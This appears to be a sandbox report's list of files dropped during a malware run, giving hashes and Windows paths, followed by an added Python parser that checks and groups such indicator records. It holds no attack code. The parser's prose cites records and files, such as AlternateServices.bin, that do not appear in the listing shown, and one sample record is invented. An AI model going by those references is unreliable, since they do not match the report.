2f9e084d4c0d8c4bdd544b2eddc440e8fab1961d224f474fe92689d77fd6522120a1fabd3d054bd7b730d56202d8559615d4ddf1bda0d6352c3b88800d991664
-
Filesize
6KB
MD5
edb2370f36466701f134811039e466ed
SHA1
ee32aedd28bf9f8aa8ee8e74bbe6bf327ac25942
SHA256
cf847b99bc9d8b67a896db145debfcec79a748ca3bf6da24575b1cff4449e30b
SHA512
1996a1b20f29eb5802e857976196ff0a0d1e219bc8e7f26700cbba4ea6a13c44c667a853b8c283c7105254a561bc79fce60774756df343c24f3f621c42244f00
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\sessionstore-backups\recovery.baklz4
Filesize
1KB
MD5
3f30077b2a8c6b7554850b041d1689e5
SHA1
a6e894ab815177d7bd5116826a515e42b7f6b94f
SHA256
ba3339c4b7d484abde48ac97e58ae5f10180214f442c7f9d2a1c3dca03b05f8e
SHA512
1284588b885b21724a7b5c68f1bfc6f177a12c96fa1cf5f17b6a5e8a427b57fceed5c7e57bc2202934bd82e6d76f7e1deaf4fa82c992781ec063c35457398683
-
Filesize
202KB
MD5
ba84dd4e0c1408828ccc1de09f585eda
SHA1
e8e10065d479f8f591b9885ea8487bc673301298
SHA256
3cff4ac91288a0ff0c13278e73b282a64e83d089c5a61a45d483194ab336b852
SHA512
7a38418f6ee8dbc66fab2cd5ad8e033e761912efc465daa484858d451da4b8576079fe90fd3b6640410edc8b3cac31c57719898134f246f4000d60a252d88290
-
Filesize
24.1MB
MD5
210fa4037da5c166143d67c7de640872
SHA1
e562d7084b36d5f634a1b71b49deb3f52187ad43
SHA256
63feedb03394bb1cd4f1a499bb5bca9ba17737f73480d02fe44eb369ad35232e
SHA512
0d50a4bbeee9dc39da654d2633d9a3f1032d8ad01f82b68f6dc8f1dcee47a6355880499a00f5928079b94edb4446472a841ba67fcf5a8d91432c7b94b795263a
-
\??\Volume{2c846130-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{073de026-62f2-4a54-94b3-6cfb9fc1cda8}_OnDiskSnapshotProp
Filesize
6KB
MD5
1913bf48f2364ad46d3d592aed714794
SHA1
9da65fc20ebdfaddd5c5e40657929f08faf165b6
SHA256
63c80366f3acd7fe4fbb5ecdda43bf3f5f25501bdb742d7d05d51e8be27af873
SHA512
8485ff5421ffa7386e29668c1312e921ae7672bbeb1a26b2063195c6179614595a8b375a753251f9c5080a1d447246c24ca249c72d5e2994df3e735fa215edca
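A dropped-files listing like the one above is usually consumed by script rather than by eye, and copies of it that pass through text extraction often arrive with each label fused to its value ("MD5c1f72c..."). The parser below is an added example, not part of this report and not any sandbox vendor's tooling. It accepts both the split form (label on one line, value on the next) and the fused form, checks every digest for the hex length its algorithm requires, and groups records by path so that a file written several times with different contents (as AlternateServices.bin and data.safe.tmp are here) stands out. The embedded sample copies three records from this report and adds one constructed record with a truncated SHA256 and missing SHA1/SHA512 to exercise the validation path; that record and its path are invented for the example.

```python
"""Parse a sandbox 'dropped files' listing into structured records.

Added example, not the report's or any sandbox vendor's code. Accepts the
split form (label on one line, value on the next) and the fused form that
text extraction produces ("MD5c1f72c..."), validates digest lengths, and
groups records by path so repeated writes to one file stand out.
"""
import re
from collections import defaultdict

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}  # hex chars
LABEL_RE = re.compile(r"^(Filesize|MD5|SHA1|SHA256|SHA512)\s*(.*)$")
PATH_RE = re.compile(r"^(?:[A-Za-z]:\\|\\\?\?\\)")  # C:\... or \??\Volume{...}

# Constructed sample: three records copied from the report (a path-less 11KB
# file in split form, and Firefox's AlternateServices.bin written twice with
# different contents in fused form) plus one record that is NOT from the
# report: its path is invented, SHA1 and SHA512 are missing, SHA256 is cut.
SAMPLE = r"""
Filesize
11KB
MD525e8156b7f7ca8dad999ee2b93a32b71
SHA1db587e9e9559b433cee57435cb97a83963659430
SHA256ddf3ba4e25a622276755133e0cce5605b83719c7cab3546e09acbfed00d6a986
SHA5121211b2fa997ba13ff926aec58b6b35a81d7fe108b0caa8f4d6369d0a37f8481373b78a4b201651243adde9e2b2699ce929482a46226ff6299b0a0e40fe2ddc56
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\AlternateServices.bin
Filesize13KB
MD5c1f72c5db28571be3511a1d41e5f5f25
SHA1bca0af39d2ac91421305ff5eb50d71b8fc0052ca
SHA256ee16e3b07366667eaee55aaaf6bd7134dab4aa31f2719239592ab27ec48f438a
SHA512f1c728079d3c78f5bace24a672db06231cd6717fccaea555e0fbdb7fd9b132eecba9ce70e66aff97cfef9e4790705d8a5ddfc3ad47ac26ea2e06c43d370a886c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\AlternateServices.bin
Filesize17KB
MD5158a818c6d948c3adf682e191041b515
SHA153116d238466d0a6c50dcde87a42f0810af952db
SHA256b84bb09b370a31b3be950a1835e02f8e69bbf04a431acac4f77a2b027296d729
SHA5120c371cc7709306fb84cdbcc1f7023f6ed21ab27c34783d002cb3aae8bcbd75f64718106f045c4678ace0f77980af85035d49607a6d625cd13a2151c58aef33c8
-
C:\constructed\bad.bin
Filesize1KB
MD500000000000000000000000000000000
SHA256abcd
"""


def parse_records(text):
    """Split the listing on '-' separator lines; return one dict per record."""
    lines = [ln.strip() for ln in text.strip().splitlines()]
    records, current, i = [], {}, 0
    while i < len(lines):
        line = lines[i]
        i += 1
        if line == "-":                       # record separator
            if current:
                records.append(current)
            current = {}
        elif PATH_RE.match(line):             # dropped-file path
            current["path"] = line
        elif (m := LABEL_RE.match(line)):     # Filesize / MD5 / SHA1 / ...
            label, value = m.group(1), m.group(2)
            if not value and i < len(lines):  # split form: value on next line
                value, i = lines[i], i + 1
            current[label] = value
    if current:
        records.append(current)
    return records


def validate(record):
    """Return a list of digest problems for one record; empty means clean."""
    problems = []
    for label, length in HASH_LEN.items():
        digest = record.get(label)
        if digest is None:
            problems.append(f"missing {label}")
        elif len(digest) != length or not re.fullmatch(r"[0-9a-fA-F]+", digest):
            problems.append(f"malformed {label}: {digest!r}")
    return problems


def versions_by_path(records):
    """Map each path to the SHA256 of every version written to it."""
    out = defaultdict(list)
    for rec in records:
        out[rec.get("path", "<no path recorded>")].append(rec.get("SHA256"))
    return dict(out)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for rec in recs:
        print(rec.get("path", "<no path recorded>"), rec.get("Filesize"), validate(rec) or "ok")
    for path, shas in versions_by_path(recs).items():
        if len(shas) > 1:
            print(f"{path}: written {len(shas)} times, {len(set(shas))} distinct contents")
```

Records without a path (the report omits the path for several entries) are kept rather than dropped, so their digests still reach a blocklist; they are simply grouped under a placeholder key. Length and hex checks catch the most common damage to copied indicators (a digest cut at a line wrap, or a label glued to the next line), which otherwise produces a hash that silently never matches anything.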